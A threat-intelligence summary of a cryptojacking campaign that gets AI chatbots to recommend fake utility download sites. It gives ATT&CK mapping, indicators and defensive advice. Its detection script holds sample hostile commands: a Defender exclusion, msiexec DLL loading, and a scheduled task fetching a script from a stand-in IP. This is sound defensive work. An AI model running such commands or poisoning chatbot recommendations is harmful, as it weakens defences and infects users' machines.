Full Report
Microsoft has warned of an active cryptojacking campaign that makes use of artificial intelligence (AI) chatbot interactions as a mechanism for surfacing malicious download sites. "This emerging delivery technique extends social engineering beyond conventional search results and increases the visibility of malicious software recommendations," Microsoft Defender Experts and the Microsoft
Analysis Summary
# Tool/Technique: AI Search Result Poisoning & High-Yield Cryptojacking
## Overview
This is an emerging delivery technique where threat actors manipulate Large Language Model (LLM) based chatbots to recommend malicious sites. The campaign specifically targets high-performance GPU users by impersonating legitimate hardware monitoring and system utility software. Once infected, the system is used for cryptocurrency mining and provides persistent remote access for potential follow-on attacks.
## Technical Details
- **Type**: Malware Delivery Technique / Cryptojacker / Remote Access Trojan (RAT)
- **Platform**: Windows
- **Capabilities**: Social engineering via AI, DLL sideloading, remote access (ScreenConnect), defense evasion (process hollowing, AV exclusions), and GPU-based cryptocurrency mining.
- **First Seen**: Observed activity reported in April 2026.
## MITRE ATT&CK Mapping
- **[TA0001 - Initial Access]**
  - [T1566 - Phishing] (AI chatbot-driven social engineering)
  - [T1583.008 - Introduce Malicious Results to Search Engines]
- **[TA0003 - Persistence]**
  - [T1547.001 - Registry Run Keys / Startup Folder]
  - [T1053.005 - Scheduled Task]
- **[TA0005 - Defense Evasion]**
  - [T1574.002 - DLL Side-Loading]
  - [T1562.001 - Disable or Modify Tools] (Microsoft Defender exclusions)
  - [T1055.012 - Process Hollowing]
- **[TA0040 - Impact]**
  - [T1496 - Resource Hijacking] (Cryptojacking)
## Functionality
### Core Capabilities
- **AI Recommendation Poisoning**: Manipulates chatbot responses to surface attacker-controlled domains instead of official software sites.
- **Strategic Mimicry**: Impersonates tools like CrystalDiskInfo, HWMonitor, FurMark, and PDFgear to filter for targets with powerful GPUs.
- **Remote Access**: Deploys a legitimate but unauthorized ScreenConnect instance to maintain a foothold on the target network.
- **Automated Mining**: Supports multiple mining engines including `gminer`, `lolMiner`, and `SRBMiner-MULTI`.
### Advanced Features
- **Process Hollowing**: Launches malicious mining code inside a trusted, Microsoft-signed binary to evade detection.
- **Living-off-the-Land (LotL)**: Utilizes `msiexec.exe` and PowerShell scripts to fetch and install secondary payloads.
- **Environment-Aware**: Monitors running processes and stops the miner when analysis or monitoring tools are detected, so that the activity is less likely to be noticed by a user or administrator.
## Indicators of Compromise
- **File Names**: `autorun.dll`, `vcredist_x64.dll`, `SimpleRunPE.exe`, `vlc.exe` (malicious masquerading), `gminer`, `lolMiner`, `SRBMiner-MULTI`.
- **Registry Keys**: Deployment of standard Registry Run keys for persistence.
- **Network Indicators**:
  - `193.42.11[.]108` (C2 Server)
  - Subdomains of `gleeze[.]com`
  - Infrastructure associated with `Dynu` (Dynamic DNS)
- **Behavioral Indicators**:
  - Unauthorized `msiexec.exe` activity involving `vcredist_x64.dll`.
  - Sudden spikes in GPU usage.
  - Creation of Microsoft Defender exclusions via command line/PowerShell.
## Associated Threat Actors
- Unknown; the campaign is currently attributed only to an unnamed, financially motivated group with potential interests in data theft and ransomware.
## Detection Methods
- **Behavioral detection**: Monitor for ScreenConnect installations originating from unusual parent processes or non-standard web downloads.
- **System Monitoring**: Watch for the creation of PowerShell-based scheduled tasks that download files from remote IP addresses.
- **EDR/AV**: Look for unauthorized modifications to Microsoft Defender exclusion lists (specifically paths or process names).
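As an added illustration of the three detections above (example code, not from Microsoft's report), a small Python rule set run over constructed Sysmon-style process-creation records. The sanctioned-parent allow list (`ccmexec.exe`), file paths and the `198.51.100.7` address are assumed sample values; the msiexec rule generalizes the `vcredist_x64.dll` indicator to any DLL passed to `msiexec.exe`.

```python
import re
from pathlib import PureWindowsPath

# Parent images assumed (hypothetically) to be this environment's sanctioned
# deployment path for ScreenConnect; any other parent counts as "unusual".
EXPECTED_RMM_PARENTS = {"ccmexec.exe"}
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I)
DOWNLOAD_CMDLET = re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
EXCLUSION = re.compile(r"\b(?:add|set)-mppreference\b.*-exclusion(?:path|process|extension)", re.I)

def base(path):
    return PureWindowsPath(path).name.lower()   # lower-cased file name of a Windows path

def classify(ev):
    """Return the names of the behavioral rules one process-creation record trips."""
    img, parent, cmd = base(ev["image"]), base(ev["parent"]), ev["cmd"]
    low, hits = cmd.lower(), []
    if EXCLUSION.search(cmd):                       # Defender exclusion added from PowerShell
        hits.append("defender_exclusion_added")
    if img == "msiexec.exe" and re.search(r"\.dll\b", low):   # msiexec used to load/register a DLL
        hits.append("msiexec_dll_execution")
    if ("schtasks" in low and "/create" in low and DOWNLOAD_CMDLET.search(cmd)
            and RAW_IP_URL.search(cmd)):            # new task that fetches from a bare IP address
        hits.append("scheduled_task_remote_download")
    if img.startswith("screenconnect") and parent not in EXPECTED_RMM_PARENTS:
        hits.append("screenconnect_unusual_parent")
    return hits

def evaluate(events):
    """Map event index -> rule hits, keeping only events that tripped a rule."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}

# Constructed sample records (Sysmon Event ID 1 style), not telemetry from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /i C:\Users\alice\Downloads\7zip.msi /qn"},                 # benign install
    {"parent": r"C:\Users\alice\Downloads\vlc.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec.exe /y C:\Users\alice\AppData\Local\Temp\vcredist_x64.dll"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell.exe -w hidden -c Add-MpPreference -ExclusionPath C:\ProgramData\gminer"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": 'schtasks /create /sc onlogon /tn Updater /tr "powershell -w hidden -c iwr http://198.51.100.7/u.ps1 -OutFile u.ps1"'},
    {"parent": r"C:\Windows\System32\msiexec.exe", "image": r"C:\Users\alice\AppData\Local\Temp\ScreenConnect.ClientSetup.exe",
     "cmd": "ScreenConnect.ClientSetup.exe /silent"},
    {"parent": r"C:\Windows\CCM\CcmExec.exe", "image": r"C:\Windows\ccmcache\a1\ScreenConnect.ClientSetup.exe",
     "cmd": "ScreenConnect.ClientSetup.exe /silent"},                                  # sanctioned deployer
]
if __name__ == "__main__":
    for i, hits in evaluate(SAMPLE_EVENTS).items():
        print(i, hits, SAMPLE_EVENTS[i]["cmd"])
```

Events 0 and 5 are deliberately benign so the allow list and the DLL condition can be seen doing their job; tune `EXPECTED_RMM_PARENTS` to whatever actually deploys remote-access software in your estate.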
## Mitigation Strategies
- **Prevention**: Educate users that AI chatbot links may be gamed or "hallucinated" and should not be trusted for software downloads.
- **Hardening**: Restrict the execution of unsigned binaries and implement "Allow Lists" for remote desktop software like ScreenConnect.
- **Content Filtering**: Block known Dynamic DNS providers (e.g., Dynu) at the network perimeter if not required for business operations.
## Related Tools/Techniques
- **SEO Poisoning**: The predecessor to AI search poisoning.
- **DLL Sideloading**: A common technique for executing malicious code via trusted applications.
- **Resource Hijacking**: Similar to the "LemonDuck" or "MyKings" botnets focused on cryptomining.